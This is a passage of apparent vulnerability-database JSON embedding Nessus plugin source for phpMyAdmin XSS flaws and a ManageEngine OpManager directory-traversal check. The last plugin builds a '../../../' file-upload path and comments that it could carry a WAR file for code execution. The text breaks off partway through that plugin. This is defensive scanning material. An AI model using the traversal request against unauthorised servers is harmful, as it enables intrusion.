\"CVE-2014-4955\",\n \"CVE-2014-4986\",\n \"CVE-2014-4987\"\n );\n 
script_bugtraq_id(\n 68798,\n 68799,\n 68803,\n 68804\n );\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 - PMASA-2014-7)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin install\nhosted on the remote web server is 4.0.x prior to 4.0.10.1, 4.1.x\nprior to 4.1.14.2, or 4.2.x prior to 4.2.6. It is, therefore, affected\nby the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being\n validated in the script 'libraries/structure.lib.php'\n and could allow cross-site scripting attacks. Note that\n this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in\n the script 'libraries/rte/rte_list.lib.php' and could\n allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are\n not being validated in the scripts 'js/functions.js'\n and 'js/tbl_structure.js' respectively and could allow\n cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error\n that could allow a remote attacker to obtain the MySQL\n user list and possibly make changes to the application\n display. Note this issue only affects the 4.1.x and\n 4.2.x branches. 
(CVE-2014-4987)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://sourceforge.net/p/phpmyadmin/news/2014/07/phpmyadmin-40101-41142-and-426-are-released/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b66a58c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/57475371a5b515c83bfc1bb2efcdf3ddb14787ed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?91815216\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/10014d4dc596b9e3a491bf04f3e708cf1887d5e1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8cdbf2d1\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/511c596b175889b8e6b9c423e352ca64fa20af2b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1aafba98\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/1b5592435617fa1b9dd68e2dc263de64c69fdc8a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?67967469\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/29a1f56495a7d1d98da31a614f23c0819a606a4d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3bfc267\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/cd5697027a2ee7e1f7d7000b23be6051cdb0516c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97997036\");\n # 
https://github.com/phpmyadmin/phpmyadmin/commit/a92753bd65e1f8b72c46ed3dda6c362628e0daf7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79fdaa0b\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/395265e9937beb21134626c01a21f44b28e712e5\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7abe0a00\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/45550b8cff06ad128129020762f9b53d125a6934\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?55cf9587\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.0.10.1 / 4.1.14.2 / 4.2.6 or later, or\napply the patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-4987\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, \"phpMyAdmin 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.1\n# 4.1.x < 4.1.14.2\n# 4.2.x < 4.2.6\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.1';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.2';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.6';\n}\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:28", "description": "Versions of phpMyAdmin 
earlier than 4.0.10.1, 4.1.14.2, or 4.2.6 are unpatched for the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being validated in the script 'libraries/structure.lib.php' and could allow cross-site scripting attacks. Note that this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in the script 'libraries/rte/rte_list.lib.php' and could allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are not being validated in the scripts 'js/functions.js' and 'js/tbl_structure.js' respectively and could allow cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error that could allow a remote attacker to obtain the MySQL user list and possibly make changes to the application display. Note this issue only affects the 4.1.x and 4.2.x branches. (CVE-2014-4987)", "cvss3": {"score": 5.4, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 through PMASA-2014-7)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987", "CVE-2014-4954"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8377.PRM", "href": "https://www.tenable.com/plugins/nnm/8377", "sourceData": "Binary data 8377.prm", "cvss": {"score": 5.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-08-19T12:49:03", "description": "The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in database structure page.\n\nWith a crafted table comment, it is possible to trigger an XSS in database structure page.\n\nSelf-XSS due to unescaped HTML output in database triggers page.\n\nWhen navigating into the database triggers page, it 
is possible to trigger an XSS with a crafted trigger name.\n\nMultiple XSS in AJAX confirmation messages.\n\nWith a crafted column name it is possible to trigger an XSS when dropping the column in table structure page. With a crafted table name it is possible to trigger an XSS when dropping or truncating the table in table operations page.\n\nAccess for an unprivileged user to MySQL user list.\n\nAn unprivileged user could view the MySQL user list and manipulate the tabs displayed in phpMyAdmin for them.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-20T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- multiple XSS vulnerabilities, missing validation (3f09ca29-0e48-11e4-b17a-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3F09CA290E4811E4B17A6805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/76600", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76600);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4954\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- multiple XSS vulnerabilities, missing validation (3f09ca29-0e48-11e4-b17a-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nSelf-XSS due to unescaped HTML output in database structure page.\n\nWith a crafted table comment, it 
is possible to trigger an XSS in\ndatabase structure page.\n\nSelf-XSS due to unescaped HTML output in database triggers page.\n\nWhen navigating into the database triggers page, it is possible to\ntrigger an XSS with a crafted trigger name.\n\nMultiple XSS in AJAX confirmation messages.\n\nWith a crafted column name it is possible to trigger an XSS when\ndropping the column in table structure page. With a crafted table name\nit is possible to trigger an XSS when dropping or truncating the table\nin table operations page.\n\nAccess for an unprivileged user to MySQL user list.\n\nAn unprivileged user could view the MySQL user list and manipulate\nthe tabs displayed in phpMyAdmin for them.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-4/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-5/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-6/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-7/\"\n );\n # https://vuxml.freebsd.org/freebsd/3f09ca29-0e48-11e4-b17a-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4e5f4d0b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:49:07", "description": "Multiple vulnerabilities has been discovered and corrected in phpmyadmin :\n\nCross-site scripting (XSS) vulnerability in the PMA_getHtmlForActionLinks function in libraries/structure.lib.php in phpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to inject arbitrary web script or HTML via a crafted table comment that is improperly handled during construction of a database structure page (CVE-2014-4954).\n\nCross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList function in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x 
before 4.1.14.2, and 4.2.x before 4.2.6 allows remote authenticated users to inject arbitrary web script or HTML via a crafted trigger name that is improperly handled on the database triggers page (CVE-2014-4955).\n\nMultiple cross-site scripting (XSS) vulnerabilities in js/functions.js in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allow remote authenticated users to inject arbitrary web script or HTML via a crafted (1) table name or (2) column name that is improperly handled during construction of an AJAX confirmation message (CVE-2014-4986).\n\nserver_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x before 4.2.6 allows remote authenticated users to bypass intended access restrictions and read the MySQL user list via a viewUsers request (CVE-2014-4987).\n\nThis upgrade provides the latest phpmyadmin version (4.2.6) to address these vulnerabilities.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:143)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-143.NASL", "href": "https://www.tenable.com/plugins/nessus/76924", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:143. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76924);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4954\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\");\n script_bugtraq_id(68798, 68799, 68803, 68804);\n script_xref(name:\"MDVSA\", value:\"2014:143\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:143)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been discovered and corrected in\nphpmyadmin :\n\nCross-site scripting (XSS) vulnerability in the\nPMA_getHtmlForActionLinks function in libraries/structure.lib.php in\nphpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to\ninject arbitrary web script or HTML via a crafted table comment that\nis improperly handled during construction of a database structure page\n(CVE-2014-4954).\n\nCross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList\nfunction in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before\n4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote\nauthenticated users to inject arbitrary web script or HTML via a\ncrafted trigger name that is improperly handled on the database\ntriggers page (CVE-2014-4955).\n\nMultiple cross-site scripting (XSS) vulnerabilities in js/functions.js\nin phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x\nbefore 4.2.6 allow remote authenticated users to inject arbitrary web\nscript or HTML via a crafted (1) table name or (2) column name that is\nimproperly handled during construction of an AJAX confirmation 
message\n(CVE-2014-4986).\n\nserver_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x\nbefore 4.2.6 allows remote authenticated users to bypass intended\naccess restrictions and read the MySQL user list via a viewUsers\nrequest (CVE-2014-4987).\n\nThis upgrade provides the latest phpmyadmin version (4.2.6) to address\nthese vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://sourceforge.net/p/phpmyadmin/news/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.6-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:46:50", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. 
(CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-16T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/nessus/81378", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. 
This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://pitstop.manageengine.com/portal/kb/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d44b4150\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6035\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n 